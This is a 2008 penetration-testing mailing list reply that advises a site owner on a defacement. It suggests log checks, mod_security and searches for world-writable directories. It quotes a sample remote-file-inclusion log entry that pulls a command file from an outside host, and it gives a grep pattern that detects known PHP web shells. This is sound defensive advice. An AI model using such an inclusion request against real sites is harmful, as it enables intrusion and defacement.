Penetration Testing mailing list archives
Re: Hacked by aLpTurkTegin, help patching this hole
From: yummy <animalstastegood () gmail com>
Date: Sun, 25 May 2008 20:03:49 -0400
What user ownership was the hacked files, the user account, or the webserver? In my experience if it was the user account, then there was a weak password and it was bruteforced. Check the ftp logs for file uploads for that user account. If it was owned by the webserver, then there is probably an exploitable php code on the site and usually it is due to a remote file inclusion. Check the apache domlogs, you might get lucky and find something. RFI entries often look sometihng like: 69.89.25.169 - - [25/Jan/2008:10:23:23 -0500] "GET //includes/img/settings.inc .php?include_path=http://example.remoteserver.com/components/com_magazine/layouts/cmd.txt?? HTTP/1.1" 200 - "-" In that above example, the php file "settings.inc.php" is vulnerable and allows for the code in a php file on a remote server (example.remoteserver.com) to be included (cmd.txt). Many times the remote file will be a phpshell. Of course this is just an example, you'd have to find what is being exploited by what the others have suggested... Sorry, This is kinda long winded and pretty much what everyone else said, but I have to deal with annoying defacement of sites everyday. People that do that really bug me, plus i'm bored right now. :) One HUGE help would be to make sure you have mod_security installed and a decent modsec ruleset. That will prevent alot of naughtyness from happening. I like to check also for perl procs running as the webserver id, worldwritable directories, and phpshells located in user accounts. find /home/useraccountname/public_html/ -type d -perm 777 will locate insecure directories. The following oneliner will find many common phpshells: find /home/*/public_html -type f -print0 | xargs -0 egrep '(\/tmp\/cmdtemp|SnIpEr_SA|c99shell|r57shell|milw0rm)' it may take quite a while to complete depending on how many files there are on the server. My money is on an outdated php CMS/forum like phpbb, etc.. like everyone else mentioned... On Tue, May 20, 2008 at 8:46 AM, Mifa <mifa () stangercorp com> wrote:
Our website was defaced by aLpTurkTegin. We are running apache, php ect. Does anyone know how this hacker is getting in and what I can do to prevent this? Our main web directory had all but one file deleted and hackedIndex.php, a.asp(a 0 byte file) and trustscn_put_test2 were placed into the main directory. The fact that the webserver served hackedindex.php makes me think its a apache web server flaw. Any comments, suggestions? Thanks, -D ------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Find out now! Get Webinar Recording and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Top 5 Common Mistakes in Securing Web Applications Find out now! Get Webinar Recording and PPT Slides www.cenzic.com/landing/securityfocus/hackinar ------------------------------------------------------------------------
Current thread:
- Hacked by aLpTurkTegin, help patching this hole Mifa (May 21)
- Re: Hacked by aLpTurkTegin, help patching this hole Jay D. Dyson (May 22)
- Re: Hacked by aLpTurkTegin, help patching this hole Utmost Bastard (May 22)
- Re: Hacked by aLpTurkTegin, help patching this hole Morning Wood (May 22)
- Re: Hacked by aLpTurkTegin, help patching this hole Danux (May 22)
- Re: Hacked by aLpTurkTegin, help patching this hole yummy (May 26)